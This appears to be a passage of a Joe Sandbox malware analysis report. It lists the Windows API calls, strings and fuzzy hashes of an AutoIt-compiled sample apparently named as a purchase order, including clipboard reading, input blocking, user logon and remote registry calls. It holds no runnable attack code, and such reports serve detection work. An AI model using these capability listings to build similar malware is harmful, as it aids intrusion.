                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                  • String ID:
                                                                  • API String ID: 901099227-0
                                                                  • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                  • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                  APIs
                                                                  • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Proc
                                                                  • String ID:
                                                                  • API String ID: 2346855178-0
                                                                  • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                  • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                  • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                  • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 0045A38B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  APIs
                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N@
                                                                  • API String ID: 0-1509896676
                                                                  APIs
                                                                  • DeleteObject.GDI32(?), ref: 0045953B
                                                                  • DeleteObject.GDI32(?), ref: 00459551
                                                                  • DestroyWindow.USER32(?), ref: 00459563
                                                                  • GetDesktopWindow.USER32 ref: 00459581
                                                                  • GetWindowRect.USER32(00000000), ref: 00459588
                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                  • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                  • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                  • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                  • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                  • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                  • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                  • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                  • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                  • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                  • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                  • _wcslen.LIBCMT ref: 00459916
                                                                  • _wcscpy.LIBCMT ref: 0045993A
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                  • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                  • GetDC.USER32(00000000), ref: 004599FC
                                                                  • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                  • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                  • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 4040870279-2373415609
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                                                  • SelectObject.GDI32(?,?), ref: 00441874
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                  • GetSysColor.USER32(00000010), ref: 004418B2
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                  • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                  • DeleteObject.GDI32(?), ref: 004418D5
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                  • FillRect.USER32(?,?,?), ref: 00441970
                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                    • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                    • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                    • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                    • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                    • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                    • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                    • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                    • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                    • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                    • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                  • String ID:
                                                                  • API String ID: 69173610-0
                                                                  • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                  • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                  • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                  • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                  APIs
                                                                  • DestroyWindow.USER32(?), ref: 004590F2
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                  • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                  • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                  • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                  • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                  • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                  • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                  • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                  • API String ID: 2910397461-517079104
                                                                  • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                  • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                  • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                  • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 1038674560-3360698832
                                                                  • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                  • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                  • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                  • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                  • SetCursor.USER32(00000000), ref: 0043075B
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                  • SetCursor.USER32(00000000), ref: 00430773
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                  • SetCursor.USER32(00000000), ref: 0043078B
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                  • SetCursor.USER32(00000000), ref: 004307A3
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                  • SetCursor.USER32(00000000), ref: 004307BB
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                  • SetCursor.USER32(00000000), ref: 004307D3
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                  • SetCursor.USER32(00000000), ref: 004307EB
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                  • SetCursor.USER32(00000000), ref: 00430803
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                  • SetCursor.USER32(00000000), ref: 0043081B
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                  • SetCursor.USER32(00000000), ref: 00430833
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                  • SetCursor.USER32(00000000), ref: 0043084B
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                  • SetCursor.USER32(00000000), ref: 00430863
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                  • SetCursor.USER32(00000000), ref: 0043087B
                                                                  • SetCursor.USER32(00000000), ref: 00430887
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                  • SetCursor.USER32(00000000), ref: 0043089F
                                                                  Similarity
                                                                  • API ID: Cursor$Load
                                                                  • String ID:
                                                                  • API String ID: 1675784387-0
                                                                  • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                  • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                  • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                  • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                  APIs
                                                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                  • GetSysColor.USER32(00000012), ref: 00430933
                                                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                  • GetSysColor.USER32(00000011), ref: 00430979
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                  • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                  • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                  Similarity
                                                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1582027408-0
                                                                  • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                  • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseConnectCreateRegistry
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 3217815495-966354055
                                                                  • Opcode ID: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                  • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                  • Opcode Fuzzy Hash: c70c32215588f8ec8bb03fc6aa478a266b625616447da64362da41b73b816162
                                                                  • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
APIs
• GetCursorPos.USER32(?), ref: 004566AE
• GetDesktopWindow.USER32 ref: 004566C3
• GetWindowRect.USER32(00000000), ref: 004566CA
• GetWindowLongW.USER32(?,000000F0), ref: 00456722
• GetWindowLongW.USER32(?,000000F0), ref: 00456735
• DestroyWindow.USER32(?), ref: 00456746
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
• SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
• SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
• IsWindowVisible.USER32(?), ref: 0045682C
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
• GetWindowRect.USER32(?,?), ref: 00456873
• MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
• GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
• CopyRect.USER32(?,?), ref: 004568BE
• SendMessageW.USER32(?,00000412,00000000), ref: 00456914
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
• String ID: ($,$tooltips_class32
APIs
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• CloseClipboard.USER32 ref: 0046DD41
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
Similarity
• API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• GetWindowRect.USER32(?,?), ref: 00471CF7
• GetClientRect.USER32(?,?), ref: 00471D05
• GetSystemMetrics.USER32(00000007), ref: 00471D0D
• GetSystemMetrics.USER32(00000008), ref: 00471D20
• GetSystemMetrics.USER32(00000004), ref: 00471D42
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
• GetSystemMetrics.USER32(00000007), ref: 00471D79
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
• GetSystemMetrics.USER32(00000008), ref: 00471DAB
• GetSystemMetrics.USER32(00000004), ref: 00471DCF
• SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
• AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
• GetClientRect.USER32(?,?), ref: 00471E8A
• GetStockObject.GDI32(00000011), ref: 00471EA6
• SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
• SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
Similarity
• API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
• String ID: @$AutoIt v3 GUI
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
Similarity
• API ID: __wcsicoll$__wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
APIs
  • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
• _fseek.LIBCMT ref: 00452B3B
• __wsplitpath.LIBCMT ref: 00452B9B
• _wcscpy.LIBCMT ref: 00452BB0
• _wcscat.LIBCMT ref: 00452BC5
• __wsplitpath.LIBCMT ref: 00452BEF
• _wcscat.LIBCMT ref: 00452C07
• _wcscat.LIBCMT ref: 00452C1C
• __fread_nolock.LIBCMT ref: 00452C53
• __fread_nolock.LIBCMT ref: 00452C64
• __fread_nolock.LIBCMT ref: 00452C83
• __fread_nolock.LIBCMT ref: 00452C94
• __fread_nolock.LIBCMT ref: 00452CB5
• __fread_nolock.LIBCMT ref: 00452CC6
• __fread_nolock.LIBCMT ref: 00452CD7
• __fread_nolock.LIBCMT ref: 00452CE8
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
• __fread_nolock.LIBCMT ref: 00452D78
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
Similarity
• API ID: Window
• String ID: 0
APIs
• GetSysColor.USER32(0000000F), ref: 0044A05E
• GetClientRect.USER32(?,?), ref: 0044A0D1
• SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
• GetWindowDC.USER32(?), ref: 0044A0F6
• GetPixel.GDI32(00000000,?,?), ref: 0044A108
• ReleaseDC.USER32(?,?), ref: 0044A11B
